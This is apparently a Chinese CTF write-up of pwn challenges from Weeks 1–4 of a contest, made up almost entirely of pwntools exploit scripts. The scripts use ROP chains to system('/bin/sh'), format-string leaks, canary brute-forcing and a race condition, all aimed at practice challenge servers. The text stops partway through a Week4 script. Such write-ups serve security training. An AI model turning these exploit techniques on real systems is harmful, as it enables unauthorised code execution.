因为都比较简单,所以基本都是直接摆 exp.py,文本量会比较少。
week3 研究强网杯去了所以打的晚了点(
有的题出的不错,有的题根本不想做。我选 pwn 方向本来就是因为不想猜谜……
不过还是比较有收获的
[Week1]
幸运星
#!/usr/bin/env python3
'''
author: Yoisaki_Kanade
time: 2025-10-04 11:10:35
'''
from pwncli import *
filename = "110509_pwn_patched"
libcname = "/home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3/amd64/libc6_2.35-0ubuntu3_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "challenge.ilovectf.cn"
port = 30555
container_id = ""
proc_name = ""
elf = context.binary = ELF(filename)
if libcname:
libc = ELF(libcname)
gs = '''
b time
c
nextret
set debug-file-directory /home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3/amd64/libc6-dbg_2.35-0ubuntu3_amd64/usr/lib/debug
set directories /home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3/amd64/glibc-source_2.35-0ubuntu3_all/usr/src/glibc/glibc-2.35
'''
context.log_level = 'debug'
context.terminal =['tmux','splitw','-h']
context.arch = 'amd64'
# 0x68e0905b
def start():
if args.GDB:
return gdb.debug(elf.path, gdbscript = gs)
elif args.REMOTE:
return remote(host, port)
elif args.DOCKER:
import docker
from os import path
p = remote(host, port)
client = docker.from_env()
container = client.containers.get(container_id=container_id)
processes_info = container.top()
titles = processes_info['Titles']
processes = [dict(zip(titles, proc)) for proc in processes_info['Processes']]
target_proc = []
for proc in processes:
cmd = proc.get('CMD', '')
exe_path = cmd.split()[0] if cmd else ''
exe_name = path.basename(exe_path)
if exe_name == proc_name:
target_proc.append(proc)
idx = 0
if len(target_proc) > 1:
for i, v in enumerate(target_proc):
print(f"{i} => {v}")
idx = int(input(f"Which one:"))
import tempfile
with tempfile.NamedTemporaryFile(prefix = 'cpwn-gdbscript-', delete=False, suffix = '.gdb', mode = 'w') as tmp:
tmp.write(f'shell rm {tmp.name}\n{gs}')
print(tmp.name)
run_in_new_terminal(["sudo", "gdb", "-p", target_proc[idx]['PID'], "-x", tmp.name])
return p
else:
return process(elf.path)
from ctypes import CDLL, c_uint, c_int, c_void_p, c_long
lib = CDLL(libcname or "libc.so.6")
srand = lib.srand
rand = lib.rand
time_fn = lib.time
srand.argtypes = [c_uint]
rand.restype = c_int
time_fn.argtypes = [c_void_p]
time_fn.restype = c_long
itob = lambda x: str(x).encode()
def glibc_rand_seq(seed, length=51):
srand(c_uint(seed & 0xffffffff))
return [(rand() % 53) + 7 for _ in range(length)]
io = start()
io.success("genete")
cnt = 0
seed = time_fn(0)
seq = glibc_rand_seq(seed)
io.success(str(len(seq)))
io.recvuntil(b"Pay attention to that guy called libc, I think you'll like it\n")
for val in seq:
io.sendlineafter(b"Please enter a number (0-60):", itob(val))
cnt+=1
sleep(0.5)
io.success(str(cnt))
print(seq)
if (cnt == 50 ):
io.interactive()
break
no vuln
简单条件竞争,部分代码 ai 写的所以可能有点难用(
#!/usr/bin/env python3
'''
author: Yoisaki_Kanade
time: 2025-10-04 10:41:20
'''
from pwncli import *
filename = "102218_NoVuln_patched"
libcname = "/home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3/amd64/libc6_2.35-0ubuntu3_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "challenge.ilovectf.cn"
port = 30268
container_id = ""
proc_name = ""
elf = context.binary = ELF(filename)
if libcname:
libc = ELF(libcname)
gs = '''
b main
set debug-file-directory /home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3/amd64/libc6-dbg_2.35-0ubuntu3_amd64/usr/lib/debug
set directories /home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3/amd64/glibc-source_2.35-0ubuntu3_all/usr/src/glibc/glibc-2.35
'''
context.log_level = 'debug'
context.terminal =['tmux','splitw','-h']
context.arch = 'amd64'
def start():
if args.GDB:
return gdb.debug(elf.path, gdbscript = gs)
elif args.REMOTE:
return remote(host, port)
elif args.DOCKER:
raise NotImplementedError("docker racing is not supported in this harness")
else:
return process(elf.path)
stop_evt = threading.Event()
def writer_worker():
while not stop_evt.is_set():
try:
io = start()
io.sendlineafter(b"If you somehow manage to trigger the impossible, you might just get a surprise...\n",b"W"*0x100)
io.recvall(timeout=3)
finally:
try:
io.close()
except Exception:
pass
def reader_worker():
while not stop_evt.is_set():
try:
io = start()
io.sendlineafter(b"If you somehow manage to trigger the impossible, you might just get a surprise...\n",b"R"*0x100)
io.interactive()
# sl(b"cat flag")
data = io.recvall(timeout=5)
if b"IM_FLAG" in data:
log.success("Hit: " + repr(data))
stop_evt.set()
return
finally:
try:
io.close()
except Exception:
pass
if __name__ == "__main__":
writers = [threading.Thread(target=writer_worker, daemon=True) for _ in range(3)]
for t in writers:
t.start()
reader_worker()
stop_evt.set()
for t in writers:
t.join(timeout=0.2)
危险的 gets
裸的栈溢出,因为简单的栈溢出太多了所以找不到exp了(
count
python有个好用的函数叫做eval.
#!/usr/bin/env python3
'''
author: Yoisaki_Kanade
time: 2025-09-20 13:59:48
'''
from pwncli import *
# filename = "pwn_patched"
libcname = "/home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "challenge.ilovectf.cn"
port = 30674
container_id = ""
proc_name = ""
# elf = context.binary = ELF(filename)
if libcname:
libc = ELF(libcname)
gs = '''
b main
set debug-file-directory /home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
c
c
'''
context.log_level = 'debug'
context.terminal =['tmux','splitw','-h']
context.arch = 'amd64'
def start():
if args.GDB:
return gdb.debug(elf.path, gdbscript = gs)
elif args.REMOTE:
return remote(host, port)
elif args.DOCKER:
import docker
from os import path
p = remote(host, port)
client = docker.from_env()
container = client.containers.get(container_id=container_id)
processes_info = container.top()
titles = processes_info['Titles']
processes = [dict(zip(titles, proc)) for proc in processes_info['Processes']]
target_proc = []
for proc in processes:
cmd = proc.get('CMD', '')
exe_path = cmd.split()[0] if cmd else ''
exe_name = path.basename(exe_path)
if exe_name == proc_name:
target_proc.append(proc)
idx = 0
if len(target_proc) > 1:
for i, v in enumerate(target_proc):
print(f"{i} => {v}")
idx = int(input(f"Which one:"))
import tempfile
with tempfile.NamedTemporaryFile(prefix = 'cpwn-gdbscript-', delete=False, suffix = '.gdb', mode = 'w') as tmp:
tmp.write(f'shell rm {tmp.name}\n{gs}')
print(tmp.name)
run_in_new_terminal(["sudo", "gdb", "-p", target_proc[idx]['PID'], "-x", tmp.name])
return p
else:
return process(elf.path)
p = start()
ia = lambda : p.interactive()
sla = lambda x,y: p.sendlineafter(x,y)
sa = lambda x,y: p.sendafter(x,y)
ru = lambda x: p.recvuntil(x)
r = lambda x : p.recv()[:x]
rl = lambda x : p.recvline()[:x]
s = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
itob = lambda x : str(x).encode()
sl(b'4100625')
ru("Are you ready?\n")
for i in range(20):
s = r(16).decode()
if(s[-1] == '='):
s = s[:-1]
print(s)
sl(itob(hex(eval(s))))
ru(b"correct!\n")
ia()
[Week2]
stackoverflow
有野生binsh字符串
#!/usr/bin/env python3
'''
author: Yoisaki_Kanade
time: 2025-10-11 10:29:12
'''
from pwncli import *
filename = "100813_pwwn_patched"
libcname = "/home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3/amd64/libc6_2.35-0ubuntu3_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "challenge.ilovectf.cn"
port = 30168
container_id = ""
proc_name = ""
elf = context.binary = ELF(filename)
if libcname:
libc = ELF(libcname)
gs = '''
b main
set debug-file-directory /home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3/amd64/libc6-dbg_2.35-0ubuntu3_amd64/usr/lib/debug
set directories /home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3/amd64/glibc-source_2.35-0ubuntu3_all/usr/src/glibc/glibc-2.35
'''
context.log_level = 'debug'
context.terminal =['tmux','splitw','-h']
context.arch = 'amd64'
def start():
if args.GDB:
return gdb.debug(elf.path, gdbscript = gs)
elif args.REMOTE:
return remote(host, port)
elif args.DOCKER:
import docker
from os import path
p = remote(host, port)
client = docker.from_env()
container = client.containers.get(container_id=container_id)
processes_info = container.top()
titles = processes_info['Titles']
processes = [dict(zip(titles, proc)) for proc in processes_info['Processes']]
target_proc = []
for proc in processes:
cmd = proc.get('CMD', '')
exe_path = cmd.split()[0] if cmd else ''
exe_name = path.basename(exe_path)
if exe_name == proc_name:
target_proc.append(proc)
idx = 0
if len(target_proc) > 1:
for i, v in enumerate(target_proc):
print(f"{i} => {v}")
idx = int(input(f"Which one:"))
import tempfile
with tempfile.NamedTemporaryFile(prefix = 'cpwn-gdbscript-', delete=False, suffix = '.gdb', mode = 'w') as tmp:
tmp.write(f'shell rm {tmp.name}\n{gs}')
print(tmp.name)
run_in_new_terminal(["sudo", "gdb", "-p", target_proc[idx]['PID'], "-x", tmp.name])
return p
else:
return process(elf.path)
p = start()
ia = lambda : p.interactive()
sla = lambda x,y: p.sendlineafter(x,y)
sa = lambda x,y: p.sendafter(x,y)
ru = lambda x: p.recvuntil(x)
r = lambda x : p.recv()[:x]
s = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
itob = lambda x : str(x).encode()
# Your exploit here
pop_rdi_ret = 0x0000000000401332
bin_sh = 0x4035C8
back = 0x40132D
pay = b'A'*(0x13+0x8) + p64(pop_rdi_ret) + p64(bin_sh) + p64(back)
ru("2. The power of water\n")
sl(b'1')
sla("[Yes/No]>>",b'No')
ru("pls show the GOD your power >>")
sl(pay)
ia()
where are my addr
开了 pie 但给了 main 基址
#!/usr/bin/env python3
'''
author: Yoisaki_Kanade
time: 2025-10-11 10:14:13
'''
from pwncli import *
filename = "101302_pwn_patched"
libcname = "/home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3/amd64/libc6_2.35-0ubuntu3_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "challenge.ilovectf.cn"
port = 30137
container_id = ""
proc_name = ""
elf = context.binary = ELF(filename)
if libcname:
libc = ELF(libcname)
gs = '''
b main
set debug-file-directory /home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3/amd64/libc6-dbg_2.35-0ubuntu3_amd64/usr/lib/debug
set directories /home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3/amd64/glibc-source_2.35-0ubuntu3_all/usr/src/glibc/glibc-2.35
'''
context.log_level = 'debug'
context.terminal =['tmux','splitw','-h']
context.arch = 'amd64'
def start():
if args.GDB:
return gdb.debug(elf.path, gdbscript = gs)
elif args.REMOTE:
return remote(host, port)
elif args.DOCKER:
import docker
from os import path
p = remote(host, port)
client = docker.from_env()
container = client.containers.get(container_id=container_id)
processes_info = container.top()
titles = processes_info['Titles']
processes = [dict(zip(titles, proc)) for proc in processes_info['Processes']]
target_proc = []
for proc in processes:
cmd = proc.get('CMD', '')
exe_path = cmd.split()[0] if cmd else ''
exe_name = path.basename(exe_path)
if exe_name == proc_name:
target_proc.append(proc)
idx = 0
if len(target_proc) > 1:
for i, v in enumerate(target_proc):
print(f"{i} => {v}")
idx = int(input(f"Which one:"))
import tempfile
with tempfile.NamedTemporaryFile(prefix = 'cpwn-gdbscript-', delete=False, suffix = '.gdb', mode = 'w') as tmp:
tmp.write(f'shell rm {tmp.name}\n{gs}')
print(tmp.name)
run_in_new_terminal(["sudo", "gdb", "-p", target_proc[idx]['PID'], "-x", tmp.name])
return p
else:
return process(elf.path)
p = start()
ia = lambda : p.interactive()
sla = lambda x,y: p.sendlineafter(x,y)
sa = lambda x,y: p.sendafter(x,y)
ru = lambda x: p.recvuntil(x)
r = lambda x : p.recv()[:x]
s = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
itob = lambda x : str(x).encode()
# Your exploit here
ru("this is a gift for you :main_addr: ")
# main_addr = u64(rl(-1).ljust(0x8,b'\0'))
main_addr = int(r(-1)[:14],16)
print(main_addr)
pay = b'a'*0x48 + p64(main_addr+ 0x11c9-0x126c+0x8)
sl(pay)
ia()
bird
假 canary,当一般栈溢出打就行(
[Week3]
fmt
简单格式化字符串
#!/usr/bin/env python3
'''
author: Yoisaki_Kanade
time: 2025-10-20 20:29:27
'''
from pwncli import *
filename = "pwn_patched"
libcname = "/home/yoisaki_kanade/.config/cpwn/pkgs/2.27-3ubuntu1.6/amd64/libc6_2.27-3ubuntu1.6_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "challenge.ilovectf.cn"
port = 30754
container_id = ""
proc_name = ""
elf = context.binary = ELF(filename)
if libcname:
libc = ELF(libcname)
gs = '''
b main
# b printf
set debug-file-directory /home/yoisaki_kanade/.config/cpwn/pkgs/2.27-3ubuntu1.6/amd64/libc6-dbg_2.27-3ubuntu1.6_amd64/usr/lib/debug
set directories /home/yoisaki_kanade/.config/cpwn/pkgs/2.27-3ubuntu1.6/amd64/glibc-source_2.27-3ubuntu1.6_all/usr/src/glibc/glibc-2.27
c
c
'''
context.log_level = 'debug'
context.terminal =['tmux','splitw','-h']
context.arch = 'amd64'
def start():
if args.GDB:
return gdb.debug(elf.path, gdbscript = gs)
elif args.REMOTE:
return remote(host, port)
elif args.DOCKER:
import docker
from os import path
p = remote(host, port)
client = docker.from_env()
container = client.containers.get(container_id=container_id)
processes_info = container.top()
titles = processes_info['Titles']
processes = [dict(zip(titles, proc)) for proc in processes_info['Processes']]
target_proc = []
for proc in processes:
cmd = proc.get('CMD', '')
exe_path = cmd.split()[0] if cmd else ''
exe_name = path.basename(exe_path)
if exe_name == proc_name:
target_proc.append(proc)
idx = 0
if len(target_proc) > 1:
for i, v in enumerate(target_proc):
print(f"{i} => {v}")
idx = int(input(f"Which one:"))
import tempfile
with tempfile.NamedTemporaryFile(prefix = 'cpwn-gdbscript-', delete=False, suffix = '.gdb', mode = 'w') as tmp:
tmp.write(f'shell rm {tmp.name}\n{gs}')
print(tmp.name)
run_in_new_terminal(["sudo", "gdb", "-p", target_proc[idx]['PID'], "-x", tmp.name])
return p
else:
return process(elf.path)
p = start()
ia = lambda : p.interactive()
sla = lambda x,y: p.sendlineafter(x,y)
sa = lambda x,y: p.sendafter(x,y)
ru = lambda x: p.recvuntil(x)
r = lambda x : p.recv(x)
rl = lambda x : p.recvline()[:x]
s = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
itob = lambda x : str(x).encode()
u64_ex = lambda x : u64(x.ljust(8,b'\0'))
def change(s):
sla("Enter your choice: ",b'2')
sla("Enter new name: ",s)
def greet():
sla("Enter your choice: ",b'1')
def bye():
sla("Enter your choice: ",b'3')
# Your exploit here
pay = b"%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p"
pay = b"%6$p-%27$p-%25$p-%9$p"
sla("Enter your name: ",pay)
# stack at 6, input at 12.
greet()
ru("hello, ")
stack_addr = int(r(14),16)
ru('-')
libc_addr = int(r(14),16) - 0x21c87
ru('-')
canary = int(r(18),16)
ru('-')
main_addr = int(r(14),16)
flag_addr = main_addr - 0x12f7 + 0x4010
change(b'%4660c%14$hn'.ljust(0x10,b'\0') + p64(flag_addr))
greet()
bin_sh = libc_addr + 0x1b3d88
pop_rdi_ret = libc_addr + 0x2164f
system = libc_addr + 0x4f420
ret = libc_addr + 0xb1485
pay = flat([
b'a'*0x68,
canary,
b'b'*0x8,
pop_rdi_ret,
bin_sh,
ret,
system
])
bye()
s(pay)
sleep(1)
sl("cat flag")
p.success(hex(stack_addr))
p.success(hex(libc_addr))
p.success(hex(canary))
p.success(hex(main_addr))
ia()
key 的大冒险(1)
可以无限 equip 物品
#!/usr/bin/env python3
'''
author: Yoisaki_Kanade
time: 2025-10-20 19:45:21
'''
from pwncli import *
filename = "190435_adventure1_patched"
libcname = "/home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3/amd64/libc6_2.35-0ubuntu3_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "challenge.ilovectf.cn"
port = 30526
container_id = ""
proc_name = ""
elf = context.binary = ELF(filename)
if libcname:
libc = ELF(libcname)
gs = '''
b main
set debug-file-directory /home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3/amd64/libc6-dbg_2.35-0ubuntu3_amd64/usr/lib/debug
set directories /home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3/amd64/glibc-source_2.35-0ubuntu3_all/usr/src/glibc/glibc-2.35
c
c
'''
context.log_level = 'debug'
context.terminal =['tmux','splitw','-h']
context.arch = 'amd64'
def start():
if args.GDB:
return gdb.debug(elf.path, gdbscript = gs)
elif args.REMOTE:
return remote(host, port)
elif args.DOCKER:
import docker
from os import path
p = remote(host, port)
client = docker.from_env()
container = client.containers.get(container_id=container_id)
processes_info = container.top()
titles = processes_info['Titles']
processes = [dict(zip(titles, proc)) for proc in processes_info['Processes']]
target_proc = []
for proc in processes:
cmd = proc.get('CMD', '')
exe_path = cmd.split()[0] if cmd else ''
exe_name = path.basename(exe_path)
if exe_name == proc_name:
target_proc.append(proc)
idx = 0
if len(target_proc) > 1:
for i, v in enumerate(target_proc):
print(f"{i} => {v}")
idx = int(input(f"Which one:"))
import tempfile
with tempfile.NamedTemporaryFile(prefix = 'cpwn-gdbscript-', delete=False, suffix = '.gdb', mode = 'w') as tmp:
tmp.write(f'shell rm {tmp.name}\n{gs}')
print(tmp.name)
run_in_new_terminal(["sudo", "gdb", "-p", target_proc[idx]['PID'], "-x", tmp.name])
return p
else:
return process(elf.path)
p = start()
ia = lambda : p.interactive()
sla = lambda x,y: p.sendlineafter(x,y)
sa = lambda x,y: p.sendafter(x,y)
ru = lambda x: p.recvuntil(x)
r = lambda x : p.recv(x)
rl = lambda x : p.recvline()[:x]
s = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
itob = lambda x : str(x).encode()
u64_ex = lambda x : u64(x.ljust(8,b'\0'))
# Your exploit here
def buy(i):
sla("Choose an option:",b'6')
sla("Enter the number of the item you want to equip (1-3):",itob(i))
sla("You want to say something to the village chief: ",b'\n')
for i in range(100):
buy(1)
buy(2)
buy(3)
sla("Choose an option:",b'1')
ia()
sokoban
审计二进制文件,发现右下角的目标位置可以无限刷分。
#!/usr/bin/env python3
'''
author: Yoisaki_Kanade
time: 2025-10-21 16:54:47
'''
from pwncli import *
filename = "165144_pwwn"
libcname = "/home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3/amd64/libc6_2.35-0ubuntu3_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "challenge.ilovectf.cn"
port = 30826
container_id = ""
proc_name = ""
elf = context.binary = ELF(filename)
if libcname:
libc = ELF(libcname)
gs = '''
b main
b *0x402723
set debug-file-directory /home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3/amd64/libc6-dbg_2.35-0ubuntu3_amd64/usr/lib/debug
set directories /home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3/amd64/glibc-source_2.35-0ubuntu3_all/usr/src/glibc/glibc-2.35
c
c
'''
context.log_level = 'debug'
context.terminal =['tmux','splitw','-h']
context.arch = 'amd64'
def start():
if args.GDB:
return gdb.debug(elf.path, gdbscript = gs)
elif args.REMOTE:
return remote(host, port)
elif args.DOCKER:
import docker
from os import path
p = remote(host, port)
client = docker.from_env()
container = client.containers.get(container_id=container_id)
processes_info = container.top()
titles = processes_info['Titles']
processes = [dict(zip(titles, proc)) for proc in processes_info['Processes']]
target_proc = []
for proc in processes:
cmd = proc.get('CMD', '')
exe_path = cmd.split()[0] if cmd else ''
exe_name = path.basename(exe_path)
if exe_name == proc_name:
target_proc.append(proc)
idx = 0
if len(target_proc) > 1:
for i, v in enumerate(target_proc):
print(f"{i} => {v}")
idx = int(input(f"Which one:"))
import tempfile
with tempfile.NamedTemporaryFile(prefix = 'cpwn-gdbscript-', delete=False, suffix = '.gdb', mode = 'w') as tmp:
tmp.write(f'shell rm {tmp.name}\n{gs}')
print(tmp.name)
run_in_new_terminal(["sudo", "gdb", "-p", target_proc[idx]['PID'], "-x", tmp.name])
return p
else:
return process(elf.path)
p = start()
ia = lambda : p.interactive()
sla = lambda x,y: p.sendlineafter(x,y)
sa = lambda x,y: p.sendafter(x,y)
ru = lambda x: p.recvuntil(x)
r = lambda x : p.recv(x)
rl = lambda x : p.recvline()[:x]
s = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
itob = lambda x : str(x).encode()
u64_ex = lambda x : u64(x.ljust(8,b'\0'))
def cmd(s):
sla("5.Exit\n",s)
def insert(i,s,c='\0'):
cmd(b'1')
sla("Index:\n",itob(i))
sla("Size:\n",itob(s))
sa("Data:\n",c)
def erase(i):
cmd(b'2')
sla("Index:\n",itob(i))
def edit(i,c='\0'):
cmd(b'3')
sla("Index:\n",itob(i))
sa("Data:\n",c)
def show(i):
cmd(b'4')
sla("Index:\n",itob(i))
# Your exploit here
ru("'0' is goal")
pay = "ddwwwwddddddsssdddwwwdsssasdd" + 3* "wddsawaasd"
sl(pay)
bss = 0x4045E0 +0x900
read_addr = 0x402712
pop_rdi_ret = 0x40264C
system = 0x402658
ret = 0x40265F
pay = flat([
b'a'*0x10,
bss,
read_addr,
])
sa("Congratulations to you!Give u a chance to sh\n",pay)
pay = flat([
b'a'*0x10,
bss + 0x200,
pop_rdi_ret,
bss + 0x20,
system,
b"/bin/sh",
])
sleep(1)
pause()
s(pay)
ia()
弥达斯之触
hyw
#!/usr/bin/env python3
'''
author: Yoisaki_Kanade
time: 2025-10-21 20:15:04
'''
from pwncli import *
filename = "midas_patched"
libcname = "/home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "challenge.ilovectf.cn"
port = 30000
container_id = ""
proc_name = ""
elf = context.binary = ELF(filename)
if libcname:
libc = ELF(libcname)
gs = '''
b main
b printf
set debug-file-directory /home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
c
c
'''
context.log_level = 'debug'
context.terminal =['tmux','splitw','-h']
context.arch = 'amd64'
def start():
if args.GDB:
return gdb.debug(elf.path, gdbscript = gs)
elif args.REMOTE:
return remote(host, port)
elif args.DOCKER:
import docker
from os import path
p = remote(host, port)
client = docker.from_env()
container = client.containers.get(container_id=container_id)
processes_info = container.top()
titles = processes_info['Titles']
processes = [dict(zip(titles, proc)) for proc in processes_info['Processes']]
target_proc = []
for proc in processes:
cmd = proc.get('CMD', '')
exe_path = cmd.split()[0] if cmd else ''
exe_name = path.basename(exe_path)
if exe_name == proc_name:
target_proc.append(proc)
idx = 0
if len(target_proc) > 1:
for i, v in enumerate(target_proc):
print(f"{i} => {v}")
idx = int(input(f"Which one:"))
import tempfile
with tempfile.NamedTemporaryFile(prefix = 'cpwn-gdbscript-', delete=False, suffix = '.gdb', mode = 'w') as tmp:
tmp.write(f'shell rm {tmp.name}\n{gs}')
print(tmp.name)
run_in_new_terminal(["sudo", "gdb", "-p", target_proc[idx]['PID'], "-x", tmp.name])
return p
else:
return process(elf.path)
p = start()
ia = lambda : p.interactive()
sla = lambda x,y: p.sendlineafter(x,y)
sa = lambda x,y: p.sendafter(x,y)
ru = lambda x: p.recvuntil(x)
r = lambda x : p.recv(x)
rl = lambda x : p.recvline()[:x]
s = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
itob = lambda x : str(x).encode()
u64_ex = lambda x : u64(x.ljust(8,b'\0'))
def cmd(s):
sla("5.Exit\n",s)
def insert(i,s,c='\0'):
cmd(b'1')
sla("Index:\n",itob(i))
sla("Size:\n",itob(s))
sa("Data:\n",c)
def erase(i):
cmd(b'2')
sla("Index:\n",itob(i))
def edit(i,c='\0'):
cmd(b'3')
sla("Index:\n",itob(i))
sa("Data:\n",c)
def show(i):
cmd(b'4')
sla("Index:\n",itob(i))
# Your exploit here
sl("%7$s")
# 何意味?何意味?何意味?何意味?何意味?
ia()
那耳喀索斯
子进程可以用来爆 canary。
#!/usr/bin/env python3
'''
author: Yoisaki_Kanade
time: 2025-10-18 22:09:40
'''
from pwncli import *
filename = "narcissus"
libcname = "/home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3.11/amd64/libc6_2.35-0ubuntu3.11_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "challenge.ilovectf.cn"
port = 30047
container_id = ""
proc_name = ""
elf = context.binary = ELF(filename)
if libcname:
libc = ELF(libcname)
gs = '''
b main
b *0x401682
set follow-fork-mode parent
set debug-file-directory /home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3.11/amd64/libc6-dbg_2.35-0ubuntu3.11_amd64/usr/lib/debug
set directories /home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3.11/amd64/glibc-source_2.35-0ubuntu3.11_all/usr/src/glibc/glibc-2.35
c
c
'''
context.log_level = 'debug'
context.terminal =['tmux','splitw','-h']
context.arch = 'amd64'
def start():
if args.GDB:
return gdb.debug(elf.path, gdbscript = gs)
elif args.REMOTE:
return remote(host, port)
elif args.DOCKER:
import docker
from os import path
p = remote(host, port)
client = docker.from_env()
container = client.containers.get(container_id=container_id)
processes_info = container.top()
titles = processes_info['Titles']
processes = [dict(zip(titles, proc)) for proc in processes_info['Processes']]
target_proc = []
for proc in processes:
cmd = proc.get('CMD', '')
exe_path = cmd.split()[0] if cmd else ''
exe_name = path.basename(exe_path)
if exe_name == proc_name:
target_proc.append(proc)
idx = 0
if len(target_proc) > 1:
for i, v in enumerate(target_proc):
print(f"{i} => {v}")
idx = int(input(f"Which one:"))
import tempfile
with tempfile.NamedTemporaryFile(prefix = 'cpwn-gdbscript-', delete=False, suffix = '.gdb', mode = 'w') as tmp:
tmp.write(f'shell rm {tmp.name}\n{gs}')
print(tmp.name)
run_in_new_terminal(["sudo", "gdb", "-p", target_proc[idx]['PID'], "-x", tmp.name])
return p
else:
return process(elf.path)
p = start()
ia = lambda : p.interactive()
sla = lambda x,y: p.sendlineafter(x,y)
sa = lambda x,y: p.sendafter(x,y)
ru = lambda x: p.recvuntil(x)
r = lambda x : p.recv(x)
# rl = p.recvline()
s = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
itob = lambda x : str(x).encode()
u64_ex = lambda x : u64(x.ljust(8,b'\0'))
pop_rdi_ret = 0x401340
ret = 0x401341
# 不断溢出 1 byte 爆破子进程直到爆完 8 bytes.
bss = 0x4040A0 + 0xa00
pay = b'a'*0x28 + b'\x00'
for i in range(2,9):
for j in range(0,8):
sa("我无法离开这里...\n",pay + bytes([j]))
get = p.recvline().decode()
print(get)
if "smashing" in get:
sla("你在湖中看见了什么?\n",b'sb')
continue
pay = pay + bytes([j])
sl(b'sb')
break
canary = u64_ex(pay[0x28:])
sla("我无法离开这里...\n",b'sb')
puts_got_addr = elf.got['puts']
puts_addr = 0x401615
pay = flat([
("你的爱人...".encode()).ljust(0x18,b'\0'),
canary,
bss,
pop_rdi_ret,
puts_got_addr,
puts_addr
])
sla("你在湖中看见了什么?",pay)
ru("我明白了\n")
libc_addr = u64_ex(r(6)) - 0x80e50
pay = flat([
("你的爱人...".encode()).ljust(0x18,b'\0'),
canary,
bss,
pop_rdi_ret,
puts_got_addr,
puts_addr
])
system = libc_addr + 0x50d70
pay = flat([
("你的爱人...".encode()).ljust(0x18,b'\0'),
canary,
bss+0x100,
pop_rdi_ret,
bss+0x28,
ret,
system,
b"/bin/sh\x00"
])
pause()
sl(pay)
p.success(hex(canary))
p.success(hex(libc_addr))
ia()
[Week4]
cpcp
只要 [rbp-buf,rbp-buf+s] 能覆盖到 ret 时的 rsp 的位置,就能拿到控制流。
所以 call read 是可以利用的(
#!/usr/bin/env python3
'''
author: Yoisaki_Kanade
time: 2025-10-27 23:44:39
'''
from pwncli import *
filename = "pwn_patched"
libcname = "/home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3.11/amd64/libc6_2.35-0ubuntu3.11_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "challenge.ilovectf.cn"
port = 30144
container_id = ""
proc_name = ""
elf = context.binary = ELF(filename)
if libcname:
libc = ELF(libcname)
gs = '''
b main
# b *0x401473
set debug-file-directory /home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3.11/amd64/libc6-dbg_2.35-0ubuntu3.11_amd64/usr/lib/debug
set directories /home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3.11/amd64/glibc-source_2.35-0ubuntu3.11_all/usr/src/glibc/glibc-2.35
c
'''
context.log_level = 'debug'
context.terminal =['tmux','splitw','-h']
context.arch = 'amd64'
def start():
if args.GDB:
return gdb.debug(elf.path, gdbscript = gs)
elif args.REMOTE:
return remote(host, port)
elif args.DOCKER:
import docker
from os import path
p = remote(host, port)
client = docker.from_env()
container = client.containers.get(container_id=container_id)
processes_info = container.top()
titles = processes_info['Titles']
processes = [dict(zip(titles, proc)) for proc in processes_info['Processes']]
target_proc = []
for proc in processes:
cmd = proc.get('CMD', '')
exe_path = cmd.split()[0] if cmd else ''
exe_name = path.basename(exe_path)
if exe_name == proc_name:
target_proc.append(proc)
